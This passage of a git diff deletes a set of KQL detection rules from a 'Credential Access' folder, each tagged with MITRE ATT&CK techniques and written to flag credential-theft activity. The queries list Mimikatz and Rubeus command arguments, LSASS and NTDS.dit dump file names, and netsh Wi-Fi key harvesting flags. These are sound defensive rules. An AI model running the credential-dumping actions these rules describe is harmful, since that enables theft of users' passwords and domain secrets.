lsass process memory -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where FolderPath endswith "dumpert.dmp" \ No newline at end of file diff --git a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql b/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql deleted file mode 100644 index 3733349a..00000000 --- a/Credential Access/HackTool_-_Hashcat_Password_Cracker_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/27 -// Level: high -// Description: Execute Hashcat.exe with provided SAM file from registry of Windows and Password list to crack against -// Tags: attack.credential_access, attack.t1110.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "-a " and ProcessCommandLine contains "-m 1000 " and ProcessCommandLine contains "-r ") or FolderPath endswith "\\hashcat.exe" \ No newline at end of file diff --git a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql b/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql deleted file mode 100644 index 271ce887..00000000 --- a/Credential Access/HackTool_-_Hydra_Password_Bruteforce_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Vasiliy Burov -// Date: 2020/10/05 -// Level: high -// Description: Detects command line parameters used by Hydra password guessing hack tool -// Tags: attack.credential_access, attack.t1110, attack.t1110.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "^USER^" or ProcessCommandLine contains "^PASS^") and (ProcessCommandLine contains "-u " and ProcessCommandLine contains "-p ") \ No newline at end of file diff --git a/Credential Access/HackTool_-_Inveigh_Execution.kql b/Credential Access/HackTool_-_Inveigh_Execution.kql deleted file mode 100644 index 55ed6692..00000000 --- a/Credential Access/HackTool_-_Inveigh_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/24 -// Level: critical -// Description: Detects the use of Inveigh a cross-platform .NET IPv4/IPv6 machine-in-the-middle tool -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where FolderPath endswith "\\Inveigh.exe" or (ProcessVersionInfoOriginalFileName in~ ("\\Inveigh.exe", "\\Inveigh.dll")) or ProcessVersionInfoFileDescription =~ "Inveigh" or (ProcessCommandLine contains " -SpooferIP" or ProcessCommandLine contains " -ReplyToIPs " or ProcessCommandLine contains " -ReplyToDomains " or ProcessCommandLine contains " -ReplyToMACs " or ProcessCommandLine contains " -SnifferIP") \ No newline at end of file diff --git a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql b/Credential Access/HackTool_-_KrbRelayUp_Execution.kql deleted file mode 100644 index d07c94db..00000000 --- a/Credential Access/HackTool_-_KrbRelayUp_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/26 -// Level: high -// Description: Detects KrbRelayUp used to perform a universal no-fix local privilege escalation in Windows domain environments where LDAP signing is not enforced -// Tags: attack.credential_access, attack.t1558.003, attack.lateral_movement, attack.t1550.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " relay " and ProcessCommandLine contains " -Domain " and ProcessCommandLine contains " -ComputerName ") or (ProcessCommandLine contains " krbscm " and ProcessCommandLine contains " -sc ") or (ProcessCommandLine contains " spawn " and ProcessCommandLine contains " -d " and ProcessCommandLine contains " -cn " and ProcessCommandLine contains " -cp ") or (FolderPath endswith "\\KrbRelayUp.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelayUp.exe") \ No newline at end of file diff --git a/Credential Access/HackTool_-_KrbRelay_Execution.kql b/Credential Access/HackTool_-_KrbRelay_Execution.kql deleted file mode 100644 index 41c083fa..00000000 --- a/Credential Access/HackTool_-_KrbRelay_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/27 -// Level: high -// Description: Detects the use of KrbRelay, a Kerberos relaying tool -// Tags: attack.credential_access, attack.t1558.003 -DeviceProcessEvents -| where (ProcessCommandLine contains " -spn " and ProcessCommandLine contains " -clsid " and ProcessCommandLine contains " -rbcd ") or (ProcessCommandLine contains "shadowcred" and ProcessCommandLine contains "clsid" and ProcessCommandLine contains "spn") or (ProcessCommandLine contains "spn " and ProcessCommandLine contains "session " and ProcessCommandLine contains "clsid ") or (FolderPath endswith "\\KrbRelay.exe" or ProcessVersionInfoOriginalFileName =~ "KrbRelay.exe") \ No newline at end of file diff --git a/Credential Access/HackTool_-_Mimikatz_Execution.kql b/Credential Access/HackTool_-_Mimikatz_Execution.kql deleted file mode 100644 index dc21b4df..00000000 --- a/Credential Access/HackTool_-_Mimikatz_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Teymur Kheirkhabarov, oscd.community, David ANDRE (additional keywords), Tim Shelton -// Date: 2019/10/22 -// Level: high -// Description: Detection well-known mimikatz command line arguments -// Tags: attack.credential_access, attack.t1003.001, attack.t1003.002, attack.t1003.004, attack.t1003.005, attack.t1003.006 -DeviceProcessEvents -| where (ProcessCommandLine contains "::aadcookie" or ProcessCommandLine contains "::detours" or ProcessCommandLine contains "::memssp" or ProcessCommandLine contains "::mflt" or ProcessCommandLine contains "::ncroutemon" or ProcessCommandLine contains "::ngcsign" or ProcessCommandLine contains "::printnightmare" or ProcessCommandLine contains "::skeleton" or ProcessCommandLine contains "::preshutdown" or ProcessCommandLine contains "::mstsc" or ProcessCommandLine contains "::multirdp") or (ProcessCommandLine contains "rpc::" or ProcessCommandLine contains "token::" or ProcessCommandLine contains "crypto::" or ProcessCommandLine contains "dpapi::" or ProcessCommandLine contains "sekurlsa::" or ProcessCommandLine contains "kerberos::" or ProcessCommandLine contains "lsadump::" or ProcessCommandLine contains "privilege::" or ProcessCommandLine contains "process::" or ProcessCommandLine contains "vault::") or (ProcessCommandLine contains "DumpCreds" or ProcessCommandLine contains "mimikatz") \ No newline at end of file diff --git a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql b/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql deleted file mode 100644 index 981465c3..00000000 --- a/Credential Access/HackTool_-_Pypykatz_Credentials_Dumping_Activity.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/01/05 -// Level: high -// Description: Detects the usage of "pypykatz" to obtain stored credentials. Adversaries may attempt to extract credential material from the Security Account Manager (SAM) database through Windows registry where the SAM database is stored -// Tags: attack.credential_access, attack.t1003.002 -DeviceProcessEvents -| where (ProcessCommandLine contains "live" and ProcessCommandLine contains "registry") and (FolderPath endswith "\\pypykatz.exe" or FolderPath endswith "\\python.exe") \ No newline at end of file diff --git a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql b/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql deleted file mode 100644 index aee2a9e3..00000000 --- a/Credential Access/HackTool_-_Quarks_PwDump_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/05 -// Level: high -// Description: Detects usage of the Quarks PwDump tool via commandline arguments -// Tags: attack.credential_access, attack.t1003.002 -DeviceProcessEvents -| where (ProcessCommandLine in~ (" -dhl", " --dump-hash-local", " -dhdc", " --dump-hash-domain-cached", " --dump-bitlocker", " -dhd ", " --dump-hash-domain ", "--ntds-file")) or FolderPath endswith "\\QuarksPwDump.exe" \ No newline at end of file diff --git a/Credential Access/HackTool_-_Rubeus_Execution.kql b/Credential Access/HackTool_-_Rubeus_Execution.kql deleted file mode 100644 index 134f2523..00000000 --- a/Credential Access/HackTool_-_Rubeus_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/12/19 -// Level: critical -// Description: Detects the execution of the hacktool Rubeus via PE information of command line parameters -// Tags: attack.credential_access, attack.t1003, attack.t1558.003, attack.lateral_movement, attack.t1550.003 -DeviceProcessEvents -| where FolderPath endswith "\\Rubeus.exe" or ProcessVersionInfoOriginalFileName =~ "Rubeus.exe" or ProcessVersionInfoFileDescription =~ "Rubeus" or (ProcessCommandLine contains "asreproast " or ProcessCommandLine contains "dump /service:krbtgt " or ProcessCommandLine contains "dump /luid:0x" or ProcessCommandLine contains "kerberoast " or ProcessCommandLine contains "createnetonly /program:" or ProcessCommandLine contains "ptt /ticket:" or ProcessCommandLine contains "/impersonateuser:" or ProcessCommandLine contains "renew /ticket:" or ProcessCommandLine contains "asktgt /user:" or ProcessCommandLine contains "harvest /interval:" or ProcessCommandLine contains "s4u /user:" or ProcessCommandLine contains "s4u /ticket:" or ProcessCommandLine contains "hash /password:" or ProcessCommandLine contains "golden /aes256:" or ProcessCommandLine contains "silver /user:") \ No newline at end of file diff --git a/Credential Access/HackTool_-_SafetyKatz_Execution.kql b/Credential Access/HackTool_-_SafetyKatz_Execution.kql deleted file mode 100644 index 2931012e..00000000 --- a/Credential Access/HackTool_-_SafetyKatz_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/10/20 -// Level: critical -// Description: Detects the execution of the hacktool SafetyKatz via PE information and default Image name -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where FolderPath endswith "\\SafetyKatz.exe" or ProcessVersionInfoOriginalFileName =~ "SafetyKatz.exe" or ProcessVersionInfoFileDescription =~ "SafetyKatz" \ No newline at end of file diff --git a/Credential Access/HackTool_-_SecurityXploded_Execution.kql b/Credential Access/HackTool_-_SecurityXploded_Execution.kql deleted file mode 100644 index 6a2b1712..00000000 --- a/Credential Access/HackTool_-_SecurityXploded_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2018/12/19 -// Level: critical -// Description: Detects the execution of SecurityXploded Tools -// Tags: attack.credential_access, attack.t1555 -DeviceProcessEvents -| where ProcessVersionInfoCompanyName =~ "SecurityXploded" or FolderPath endswith "PasswordDump.exe" or ProcessVersionInfoOriginalFileName endswith "PasswordDump.exe" \ No newline at end of file diff --git a/Credential Access/HackTool_-_WinPwn_Execution.kql b/Credential Access/HackTool_-_WinPwn_Execution.kql deleted file mode 100644 index bd621578..00000000 --- a/Credential Access/HackTool_-_WinPwn_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/12/04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - -// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 -DeviceProcessEvents -| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql b/Credential Access/Hacktool_Execution_-_PE_Metadata.kql deleted file mode 100644 index 9f37a725..00000000 --- a/Credential Access/Hacktool_Execution_-_PE_Metadata.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/04/27 -// Level: high -// Description: Detects the execution of different Windows based hacktools via PE metadata (company, product, etc.) even if the files have been renamed -// Tags: attack.credential_access, attack.t1588.002, attack.t1003 -DeviceProcessEvents -| where ProcessVersionInfoCompanyName =~ "Cube0x0" \ No newline at end of file diff --git a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql deleted file mode 100644 index 7d6acba4..00000000 --- a/Credential Access/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), oscd.community -// Date: 2020/04/20 -// Level: medium -// Description: Detect the harvesting of wifi credentials using netsh.exe -// Tags: attack.discovery, attack.credential_access, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql b/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql deleted file mode 100644 index ed32575d..00000000 --- a/Credential Access/Invocation_of_Active_Directory_Diagnostic_Tool_(ntdsutil.exe).kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Thomas Patzke -// Date: 2019/01/16 -// Level: medium -// Description: Detects execution of ntdsutil.exe, which can be used for various attacks against the NTDS database (NTDS.DIT) -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where FolderPath endswith "\\ntdsutil.exe" \ No newline at end of file diff --git a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql b/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql deleted file mode 100644 index 3e04ec9d..00000000 --- a/Credential Access/LSASS_Dump_Keyword_In_CommandLine.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: E.M. Anhaus, Tony Lambert, oscd.community, Nasreddine Bencherchali (Nextron Systems) -// Date: 2019/10/24 -// Level: high -// Description: Detects the presence of the keywords "lsass" and ".dmp" in the commandline, which could indicate a potential attempt to dump or create a dump of the lsass process. - -// Tags: attack.credential_access, attack.t1003.001 -DeviceProcessEvents -| where (ProcessCommandLine contains "lsass.dmp" or ProcessCommandLine contains "lsass.zip" or ProcessCommandLine contains "lsass.rar" or ProcessCommandLine contains "Andrew.dmp" or ProcessCommandLine contains "Coredump.dmp" or ProcessCommandLine contains "NotLSASS.zip" or ProcessCommandLine contains "lsass_2" or ProcessCommandLine contains "lsassdump" or ProcessCommandLine contains "lsassdmp") or (ProcessCommandLine contains "lsass" and ProcessCommandLine contains ".dmp") or (ProcessCommandLine contains "SQLDmpr" and ProcessCommandLine contains ".mdmp") or (ProcessCommandLine contains "nanodump" and ProcessCommandLine contains ".dmp") \ No newline at end of file diff --git a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql b/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql deleted file mode 100644 index 64fa624b..00000000 --- a/Credential Access/LSASS_Process_Dump_Artefact_In_CrashDumps_Folder.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @pbssubhash -// Date: 2022/12/08 -// Level: high -// Description: Detects the presence of an LSASS dump file in the "CrashDumps" folder. This could be a sign of LSASS credential dumping. Techniques such as the LSASS Shtinkering have been seen abusing the Windows Error Reporting to dump said process. -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where FolderPath contains "lsass.exe." and FolderPath endswith ".dmp" and FolderPath startswith "C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\" \ No newline at end of file diff --git a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql b/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql deleted file mode 100644 index 1315b6f9..00000000 --- a/Credential Access/LSASS_Process_Memory_Dump_Creation_Via_Taskmgr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/10/19 -// Level: high -// Description: Detects the creation of an "lsass.dmp" file by the taskmgr process. This indicates a manual dumping of the LSASS.exe process memory using Windows Task Manager. -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where (InitiatingProcessFolderPath endswith ":\\Windows\\system32\\taskmgr.exe" or InitiatingProcessFolderPath endswith ":\\Windows\\SysWOW64\\taskmgr.exe") and (FolderPath contains "\\AppData\\Local\\Temp\\" and FolderPath contains "\\lsass" and FolderPath contains ".DMP") \ No newline at end of file diff --git a/Credential Access/LSASS_Process_Memory_Dump_Files.kql b/Credential Access/LSASS_Process_Memory_Dump_Files.kql deleted file mode 100644 index ef02e00f..00000000 --- a/Credential Access/LSASS_Process_Memory_Dump_Files.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/11/15 -// Level: high -// Description: Detects creation of files with names used by different memory dumping tools to create a memory dump of the LSASS process memory, which contains user credentials. -// Tags: attack.credential_access, attack.t1003.001 -DeviceFileEvents -| where (FolderPath endswith "\\lsass.dmp" or FolderPath endswith "\\lsass.zip" or FolderPath endswith "\\lsass.rar" or FolderPath endswith "\\Andrew.dmp" or FolderPath endswith "\\Coredump.dmp" or FolderPath endswith "\\NotLSASS.zip" or FolderPath endswith "\\PPLBlade.dmp") or (FolderPath contains "\\lsass_2" or FolderPath contains "\\lsassdump" or FolderPath contains "\\lsassdmp") or (FolderPath contains "\\lsass" and FolderPath contains ".dmp") or (FolderPath contains "SQLDmpr" and FolderPath endswith ".mdmp") or (FolderPath endswith ".dmp" and FolderPath startswith "nanodump") \ No newline at end of file diff --git a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql b/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql deleted file mode 100644 index 5a56bd67..00000000 --- a/Credential Access/LSASS_Process_Reconnaissance_Via_Findstr.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/12 -// Level: high -// Description: Detects findstring commands that include the keyword lsass, which indicates recon actviity for the LSASS process PID -// Tags: attack.credential_access, attack.t1552.006 -DeviceProcessEvents -| where (ProcessCommandLine contains "lsass" and ((FolderPath endswith "\\find.exe" or FolderPath endswith "\\findstr.exe") or (ProcessVersionInfoOriginalFileName in~ ("FIND.EXE", "FINDSTR.EXE")))) or (ProcessCommandLine contains " /i \"lsass" or ProcessCommandLine contains " /i lsass.exe" or ProcessCommandLine contains "findstr \"lsass" or ProcessCommandLine contains "findstr lsass" or ProcessCommandLine contains "findstr.exe \"lsass" or ProcessCommandLine contains "findstr.exe lsass") \ No newline at end of file diff --git a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql b/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql deleted file mode 100644 index 2fa5f37f..00000000 --- a/Credential Access/Lsass_Full_Dump_Request_Via_DumpType_Registry_Settings.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: @pbssubhash -// Date: 2022/12/08 -// Level: high -// Description: Detects the setting of the "DumpType" registry value to "2" which stands for a "Full Dump". Technique such as LSASS Shtinkering requires this value to be "2" in order to dump LSASS. -// Tags: attack.credential_access, attack.t1003.001 -DeviceRegistryEvents -| where RegistryValueData =~ "DWORD (0x00000002)" and (RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\DumpType" or RegistryKey contains "\\SOFTWARE\\Microsoft\\Windows\\Windows Error Reporting\\LocalDumps\\lsass.exe\\DumpType") \ No newline at end of file diff --git a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql b/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql deleted file mode 100644 index 8e3a1035..00000000 --- a/Credential Access/Microsoft_IIS_Connection_Strings_Decryption.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Elastic (idea) -// Date: 2022/09/28 -// Level: high -// Description: Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command. -// Tags: attack.credential_access, attack.t1003 -DeviceProcessEvents -| where (ProcessCommandLine contains "connectionStrings" and ProcessCommandLine contains " -pdf") and (FolderPath endswith "\\aspnet_regiis.exe" or ProcessVersionInfoOriginalFileName =~ "aspnet_regiis.exe") \ No newline at end of file diff --git a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql b/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql deleted file mode 100644 index 633a86ce..00000000 --- a/Credential Access/Microsoft_IIS_Service_Account_Password_Dumped.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Tim Rauch, Janantha Marasinghe, Elastic (original idea) -// Date: 2022/11/08 -// Level: high -// Description: Detects the Internet Information Services (IIS) command-line tool, AppCmd, being used to list passwords -// Tags: attack.credential_access, attack.t1003 -DeviceProcessEvents -| where (ProcessCommandLine contains "list " and (FolderPath endswith "\\appcmd.exe" or ProcessVersionInfoOriginalFileName =~ "appcmd.exe")) and ((ProcessCommandLine contains " /config" or ProcessCommandLine contains " /xml" or ProcessCommandLine contains " -config" or ProcessCommandLine contains " -xml") or ((ProcessCommandLine contains " /@t" or ProcessCommandLine contains " /text" or ProcessCommandLine contains " /show" or ProcessCommandLine contains " -@t" or ProcessCommandLine contains " -text" or ProcessCommandLine contains " -show") and (ProcessCommandLine contains ":*" or ProcessCommandLine contains "password"))) \ No newline at end of file diff --git a/Credential Access/Mimikatz_Kirbi_File_Creation.kql b/Credential Access/Mimikatz_Kirbi_File_Creation.kql deleted file mode 100644 index 29c1c896..00000000 --- a/Credential Access/Mimikatz_Kirbi_File_Creation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), David ANDRE -// Date: 2021/11/08 -// Level: critical -// Description: Detects the creation of files created by mimikatz such as ".kirbi", "mimilsa.log", etc. -// Tags: attack.credential_access, attack.t1558 -DeviceFileEvents -| where FolderPath endswith ".kirbi" or FolderPath endswith "mimilsa.log" \ No newline at end of file diff --git a/Credential Access/NPPSpy_Hacktool_Usage.kql b/Credential Access/NPPSpy_Hacktool_Usage.kql deleted file mode 100644 index 5b0bddd5..00000000 --- a/Credential Access/NPPSpy_Hacktool_Usage.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2021/11/29 -// Level: high -// Description: Detects the use of NPPSpy hacktool that stores cleartext passwords of users that logged in to a local file -// Tags: attack.credential_access -DeviceFileEvents -| where FolderPath endswith "\\NPPSpy.txt" or FolderPath endswith "\\NPPSpy.dll" \ No newline at end of file diff --git a/Credential Access/NTDS.DIT_Created.kql b/Credential Access/NTDS.DIT_Created.kql deleted file mode 100644 index 09925740..00000000 --- a/Credential Access/NTDS.DIT_Created.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/05/05 -// Level: low -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) -// Tags: attack.credential_access, attack.t1003.003 -DeviceFileEvents -| where FolderPath endswith "ntds.dit" \ No newline at end of file diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql deleted file mode 100644 index e4c7f6cf..00000000 --- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Parent_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/11 -// Level: high -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon parent process or directory -// Tags: attack.credential_access, attack.t1003.003 -DeviceFileEvents -| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessParentFileName in~ ("cscript.exe", "httpd.exe", "nginx.exe", "php-cgi.exe", "powershell.exe", "pwsh.exe", "w3wp.exe", "wscript.exe")) or (InitiatingProcessParentFileName startswith "apache" or InitiatingProcessParentFileName startswith "tomcat" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "" or InitiatingProcessParentFileName startswith "")) \ No newline at end of file diff --git a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql b/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql deleted file mode 100644 index 82bd459b..00000000 --- a/Credential Access/NTDS.DIT_Creation_By_Uncommon_Process.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/01/11 -// Level: high -// Description: Detects creation of a file named "ntds.dit" (Active Directory Database) by an uncommon process or a process located in a suspicious directory -// Tags: attack.credential_access, attack.t1003.002, attack.t1003.003 -DeviceFileEvents -| where FolderPath endswith "\\ntds.dit" and ((InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe" or InitiatingProcessFolderPath endswith "\\wsl.exe" or InitiatingProcessFolderPath endswith "\\wt.exe") or (InitiatingProcessFolderPath contains "\\AppData\\" or InitiatingProcessFolderPath contains "\\Temp\\" or InitiatingProcessFolderPath contains "\\Public\\" or InitiatingProcessFolderPath contains "\\PerfLogs\\")) \ No newline at end of file diff --git a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql b/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql deleted file mode 100644 index ab57a2e4..00000000 --- a/Credential Access/NTDS_Exfiltration_Filename_Patterns.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/03/11 -// Level: high -// Description: Detects creation of files with specific name patterns seen used in various tools that export the NTDS.DIT for exfiltration. -// Tags: attack.credential_access, attack.t1003.003 -DeviceFileEvents -| where FolderPath endswith "\\All.cab" or FolderPath endswith ".ntds.cleartext" \ No newline at end of file diff --git a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql b/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql deleted file mode 100644 index 4a27d643..00000000 --- a/Credential Access/New_Generic_Credentials_Added_Via_Cmdkey.EXE.kql +++ /dev/null @@ -1,9 +0,0 @@ -// Author: frack113, Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/03 -// Level: medium -// Description: Detects usage of "cmdkey.exe" to add generic credentials. -As an example, this can be used before connecting to an RDP session via command line interface. - -// Tags: attack.credential_access, attack.t1003.005 -DeviceProcessEvents -| where (ProcessCommandLine contains " -g" or ProcessCommandLine contains " /g") and (ProcessCommandLine contains " -p" or ProcessCommandLine contains " /p") and (ProcessCommandLine contains " -u" or ProcessCommandLine contains " /u") and (FolderPath endswith "\\cmdkey.exe" or ProcessVersionInfoOriginalFileName =~ "cmdkey.exe") \ No newline at end of file diff --git a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql b/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql deleted file mode 100644 index fb03775e..00000000 --- a/Credential Access/New_Network_Trace_Capture_Started_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Kutepov Anton, oscd.community -// Date: 2019/10/24 -// Level: medium -// Description: Detects the execution of netsh with the "trace" flag in order to start a network capture -// Tags: attack.discovery, attack.credential_access, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "trace" and ProcessCommandLine contains "start") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql b/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql deleted file mode 100644 index fc358165..00000000 --- a/Credential Access/PUA_-_DIT_Snapshot_Viewer.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Furkan Caliskan (@caliskanfurkan_) -// Date: 2020/07/04 -// Level: high -// Description: Detects the use of Ditsnap tool, an inspection tool for Active Directory database, ntds.dit. -// Tags: attack.credential_access, attack.t1003.003 -DeviceProcessEvents -| where FolderPath endswith "\\ditsnap.exe" or ProcessCommandLine contains "ditsnap.exe" \ No newline at end of file diff --git a/Credential Access/PUA_-_Mouse_Lock_Execution.kql b/Credential Access/PUA_-_Mouse_Lock_Execution.kql deleted file mode 100644 index cad3d884..00000000 --- a/Credential Access/PUA_-_Mouse_Lock_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Cian Heasley -// Date: 2020/08/13 -// Level: medium -// Description: In Kaspersky's 2020 Incident Response Analyst Report they listed legitimate tool "Mouse Lock" as being used for both credential access and collection in security incidents. -// Tags: attack.credential_access, attack.collection, attack.t1056.002 -DeviceProcessEvents -| where ProcessVersionInfoProductName contains "Mouse Lock" or ProcessVersionInfoCompanyName contains "Misc314" or ProcessCommandLine contains "Mouse Lock_" \ No newline at end of file diff --git a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql b/Credential Access/PUA_-_WebBrowserPassView_Execution.kql deleted file mode 100644 index 09a3fc49..00000000 --- a/Credential Access/PUA_-_WebBrowserPassView_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/20 -// Level: medium -// Description: Detects the execution of WebBrowserPassView.exe. A password recovery tool that reveals the passwords stored by the following Web browsers, Internet Explorer (Version 4.0 - 11.0), Mozilla Firefox (All Versions), Google Chrome, Safari, and Opera -// Tags: attack.credential_access, attack.t1555.003 -DeviceProcessEvents -| where ProcessVersionInfoFileDescription =~ "Web Browser Password Viewer" or FolderPath endswith "\\WebBrowserPassView.exe" \ No newline at end of file diff --git a/Credential Access/Permission_Misconfiguration_Reconnaissance_Via_Findstr.EXE.kql b/Credential 